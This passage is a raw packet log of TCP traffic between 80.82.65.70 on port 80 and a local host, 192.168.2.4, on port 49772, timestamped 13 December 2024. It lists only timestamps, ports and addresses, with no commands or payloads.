                                          Dec 13, 2024 08:36:34.415263891 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.415370941 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.415415049 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.416143894 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.416246891 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.416297913 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.417078018 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.417133093 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.417217970 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.417260885 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.417979002 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.418025970 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.418050051 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.418092966 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.418813944 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.418862104 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.418961048 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.419641018 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.419795990 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.419816017 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.419855118 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.420664072 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.420741081 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.420770884 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.420804977 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.421531916 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.421631098 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.421653986 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.421684980 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.422431946 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.422534943 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.422574997 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.423336029 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.423382998 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.423444986 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.423489094 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.512882948 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.512933016 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.512999058 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.513092995 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.513324976 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.513377905 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.513403893 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.513420105 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.514226913 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.514349937 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.514359951 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.514384031 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.515086889 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.515130997 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.572001934 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.572057009 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.572091103 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.572124004 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.572252989 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.572297096 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.572345018 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.572375059 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.573107958 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.573148966 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.573204041 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.573237896 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.574023962 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.574089050 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.574121952 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.574157953 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.574904919 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.574950933 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.575150013 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.575381041 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.575783968 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.575823069 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.575915098 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.575953007 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.576733112 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.576766968 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.576812983 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.577558041 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.577687025 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.577694893 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.577734947 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.578461885 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.578510046 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.578608036 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.578681946 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.579353094 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.579488993 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.579546928 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.580236912 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.580281973 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.580383062 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.580425978 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.581149101 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.581171989 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.581212044 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.582031965 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.582081079 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.582133055 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.582171917 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.582937002 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.582978964 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.583026886 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.583066940 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.583846092 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.583888054 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.583954096 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.583992004 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.584783077 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.584845066 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.584968090 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.585005999 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.585664034 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.585746050 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.585938931 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.585980892 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.586504936 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.586545944 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.586653948 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.586800098 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.587409019 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.587476015 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.587522984 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.587564945 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.588339090 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.588409901 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.588449955 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.589183092 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.589221954 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.589281082 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.589404106 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.590094090 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.590230942 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.590266943 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.590989113 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.591026068 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.591059923 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.591094971 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.591891050 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.591936111 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.592026949 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.592127085 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.592818975 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.592864990 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.592952013 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.592997074 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.593693018 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.593858004 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.593864918 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.593920946 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.594578981 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.594753981 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.594806910 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.595572948 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.595619917 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.595695972 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.595733881 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.596359968 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.596407890 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.596470118 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.596514940 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.597301006 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.597440958 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.597482920 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.598150969 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.598191023 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.598612070 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.598650932 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.599020004 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.599062920 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.599272013 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.599320889 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.599936008 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.599992037 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.600039005 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.600079060 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.600846052 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.600883007 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.600893974 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.600919962 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.601778030 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.601823092 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.601881981 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.601923943 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.602734089 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.602920055 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.602963924 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.603497028 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.603548050 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.603602886 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.603638887 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.604383945 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.604429007 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.604566097 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.604604006 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.605324030 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.605367899 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.606132030 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.606177092 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.606215954 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.606256008 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.606408119 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.606456995 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.607129097 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.607173920 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.607280970 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.607321024 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.608103037 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.608151913 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.608202934 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.608243942 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.608913898 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.609002113 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.609045029 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.609760046 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.609816074 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.609824896 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.609864950 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.610686064 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.610727072 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.610747099 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.610789061 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.611541033 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.611582041 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.611608982 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.611654043 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.612457037 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.612508059 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.612649918 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.612808943 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.613346100 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.613390923 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.613487959 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.613718033 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.614217043 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.614288092 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.614336014 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.614399910 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.615134954 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.615241051 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.615276098 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.615323067 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.615968943 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.616010904 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.704859972 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.704916954 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.705025911 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.705064058 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.705305099 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.705351114 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.705467939 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.705506086 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.705554008 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.705621958 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.706419945 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.706432104 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.706480026 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.706504107 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.707319021 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.707364082 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.770191908 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.770276070 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.770334005 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.770365953 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.770459890 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.770551920 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.770591974 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.771328926 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.771373034 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.771409988 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.771452904 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.772262096 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.772305965 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.772372007 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.772419930 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.773118019 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.773159027 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.773224115 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.773266077 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.774004936 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.774044991 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.774105072 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.774148941 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.774887085 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.775046110 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.775091887 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.775790930 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.775835991 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.775913000 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.775958061 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.776685953 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.776732922 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.776794910 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.776839018 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.777595043 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.777652025 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.777693987 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.777736902 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.778459072 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.778625011 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.778676033 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.779390097 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.779428959 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.779449940 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.779484034 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.780277014 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.780378103 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.780431986 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.781157017 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.781208038 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.781300068 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.781374931 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.782025099 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.782075882 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.782103062 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.782147884 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.782932043 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.783019066 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.783066988 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.783862114 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.783915997 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.783941984 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.783986092 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.784759045 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.784802914 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.784828901 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.784872055 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.785651922 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.785697937 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.785809994 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.785854101 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.786506891 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.786628008 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.786681890 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.787409067 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.787461042 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.787539959 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.787589073 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.788299084 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.788350105 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.788446903 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.788500071 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.789264917 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.789318085 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.789374113 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.789431095 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.790107012 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.790153980 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.790220022 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.790276051 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.790997982 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.791109085 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.791165113 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.791881084 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.791935921 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.791980028 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.792028904 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.792762995 CET804977280.82.65.70192.168.2.4
